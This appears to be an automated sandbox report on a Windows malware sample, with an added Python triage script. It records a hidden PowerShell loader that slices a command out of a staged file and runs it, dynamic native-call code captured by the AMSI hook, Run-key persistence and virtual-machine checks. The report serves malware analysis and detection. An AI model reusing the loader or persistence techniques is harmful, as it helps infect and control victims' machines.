          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdbMZ@ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb4' source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbu source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Windows.Forms.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.pdbh source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb.> source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: em.Core.pdbM source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Numerics.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb, source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr

          Data Obfuscation

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: GetDelegateForFunctionPointer((Motherland $Deamidation $Highjacks), (Toozoo @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Direach = [AppDomain]::CurrentDomain.GetAssemblies()$global:So
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Antiklimakser)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Amtsgymnasiet, $false).DefineType($Skraasej
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"  (listed twice in the report)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3D6D1 push ebx; ret 10_2_08C3D6D2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C36EF2 push dword ptr [ebx+esi*2]; iretd 10_2_08C36F18
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C366F2 push es; retf 10_2_08C366F3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3D69E push 53A2941Bh; ret 10_2_08C3D6AA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C390B0 push 97920D78h; ret 10_2_08C390B5
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3CA0C push edx; ret 10_2_08C3CA0D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3B21D push F32D283Ch; retf 10_2_08C3B222
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3B62C push eax; ret 10_2_08C3B637
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C36D61 push ss; ret 10_2_08C36D62
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_08C3DF65 push ebx; ret 10_2_08C3DF72
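
          The loader command line and the two AMSI captures above show the staging pattern: Get-Content reads a text file into a variable, .SubString(69838,3) slices three characters out of it, and the ".$name(...)" call operator invokes that slice as a command with the whole file as its argument; the decoded stage then builds native call delegates with GetDelegateForFunctionPointer and a dynamic assembly instead of Add-Type. The following triage helper is an added example, not part of the Joe Sandbox report and not the sample's code. The staged file Ruralt.Tea is not on the page, so build_stage() constructs a stand-in whose slice at offset 69838 is the three-character Invoke-Expression alias iex; that value is an assumption, the real slice is unknown here. The regex, marker list and triage() function are all hypothetical names chosen for this example.

```python
"""Triage of the offset-slice PowerShell loader recorded in the report.

Added example; not part of the Joe Sandbox report and not the sample's code.
The stage file is CONSTRUCTED (build_stage); the 'iex' slice is an assumption.
"""
import re

# Loader command line exactly as recorded in the report.
OBSERVED_CMDLINE = (
    r'''"powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';'''
    r'''$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"'''
)

# The two fragments the AMSI hook captured from the decoded stage (from the report).
OBSERVED_AMSI = [
    "GetDelegateForFunctionPointer((Motherland $Deamidation $Highjacks), "
    "(Toozoo @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Antiklimakser)), "
    "[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Amtsgymnasiet, $false)",
]

# Shape of the staging call: $blob = Get-Content 'file'; $cmd = $blob.SubString(off,len); .$cmd($blob)
LOADER_RE = re.compile(
    r"\$(?P<blob>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;\s*"
    r"\$(?P<cmd>\w+)\s*=\s*\$(?P=blob)\.SubString\((?P<offset>\d+)\s*,\s*(?P<length>\d+)\)\s*;\s*"
    r"\.\$(?P=cmd)\(\$(?P=blob)\)",
    re.IGNORECASE,
)

# Tokens that together mark delegate-based native calls built without Add-Type.
DYNAMIC_PINVOKE_MARKERS = (
    "getdelegateforfunctionpointer",
    "definedynamicassembly",
    "definedynamicmodule",
    "assemblybuilderaccess",
)


def parse_loader(cmdline):
    """Return the stage path, slice offset/length and window state, or None."""
    m = LOADER_RE.search(cmdline)
    if m is None:
        return None
    return {
        "path": m.group("path"),
        "offset": int(m.group("offset")),
        "length": int(m.group("length")),
        "hidden": "-windowstyle hidden" in cmdline.lower(),
    }


def recover_cmdlet(stage_text, offset, length):
    """Apply the same .SubString(offset, length) slice the loader applies."""
    if offset + length > len(stage_text):
        raise ValueError("slice %d+%d lies past the end of the stage" % (offset, length))
    return stage_text[offset:offset + length]


def build_stage(cmdlet="iex", offset=69838, total=80000):
    """Constructed stand-in for Ruralt.Tea: filler with the cmdlet planted at offset.

    A real stage is a long obfuscated script; what matters for the loader is only
    that the slice at the hard-coded offset yields an invocation verb (assumed iex).
    """
    filler = "#" * total
    return filler[:offset] + cmdlet + filler[offset + len(cmdlet):]


def dynamic_pinvoke_markers(text):
    """Markers of the dynamic-delegate P/Invoke technique present in a script fragment."""
    low = text.lower()
    return [m for m in DYNAMIC_PINVOKE_MARKERS if m in low]


def triage(cmdline, amsi_fragments, stage_text=None):
    """Combine command-line parsing, optional slice recovery and AMSI marker checks."""
    findings = []
    loader = parse_loader(cmdline)
    if loader:
        findings.append("offset-slice loader reading %s, slice [%d:%d]"
                        % (loader["path"], loader["offset"], loader["offset"] + loader["length"]))
        if loader["hidden"]:
            findings.append("window hidden")
        if stage_text is not None:
            findings.append("slice resolves to %r"
                            % recover_cmdlet(stage_text, loader["offset"], loader["length"]))
    markers = sorted({m for frag in amsi_fragments for m in dynamic_pinvoke_markers(frag)})
    if markers:
        findings.append("dynamic P/Invoke markers: " + ", ".join(markers))
    return findings


if __name__ == "__main__":
    for line in triage(OBSERVED_CMDLINE, OBSERVED_AMSI, build_stage()):
        print(line)
```

          On a real case, pass the content of the recovered stage file in place of build_stage() and recover_cmdlet() tells you exactly which verb the loader executes; the hard-coded offset is also a useful pivot, because it changes with every build and so doubles as a per-campaign indicator.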

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Temp\Partivarerne.scr  (listed twice in the report)
          Source: C:\Windows\SysWOW64\cmd.exe  Process created: reg.exe  (4 entries)
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  File created: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  File created: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsExec.dll
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  File created: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dll
          Source: C:\Windows\SysWOW64\reg.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  Preferentialist  (2 entries)
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  Process information set: NOOPENFILEERRORBOX  (3 entries)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (119 entries)
          Source: C:\Windows\SysWOW64\cmd.exe  Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX  (5 entries)
          Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: NOOPENFILEERRORBOX  (21 entries)
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 8487
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1182
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsExec.dll
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000; Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3028; Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (2 occurrences)
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; Code function: 0_2_00405FFD FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; Code function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; Code function: 0_2_00402688 FindFirstFileA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData\Roaming
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData
          Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
          Source: Amcache.hve.33.dr; Binary or memory string: VMware
          Source: Amcache.hve.33.dr; Binary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.33.dr; Binary or memory string: vmci.syshbin
          Source: Amcache.hve.33.dr; Binary or memory string: VMware, Inc.
          Source: anziOUzZJs.exe, 00000000.00000002.1323264794.00000000004B1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\}}
          Source: powershell.exe, 0000000A.00000002.2007087274.00000000070FB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWZS
          Source: Amcache.hve.33.dr; Binary or memory string: VMware20,1hbin@
          Source: anziOUzZJs.exe, 00000000.00000002.1323264794.00000000004B1000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:GG<
          Source: Amcache.hve.33.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.33.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.33.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Sources: powershell.exe, 0000000A.00000002.2010084305.00000000081BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.000000000711C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2507024953.0000014BA0454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2505366099.0000014B9AE2B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
          Source: Amcache.hve.33.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.33.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.33.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.33.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.33.dr; Binary or memory string: vmci.sys
          Source: Amcache.hve.33.dr; Binary or memory string: vmci.syshbin`
          Source: Amcache.hve.33.dr; Binary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.33.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.33.dr; Binary or memory string: VMware20,1
          Source: Amcache.hve.33.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.33.dr; Binary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.33.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.33.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.33.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.33.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.33.dr; Binary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.33.dr; Binary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.33.dr; Binary or memory string: VMware Virtual RAM
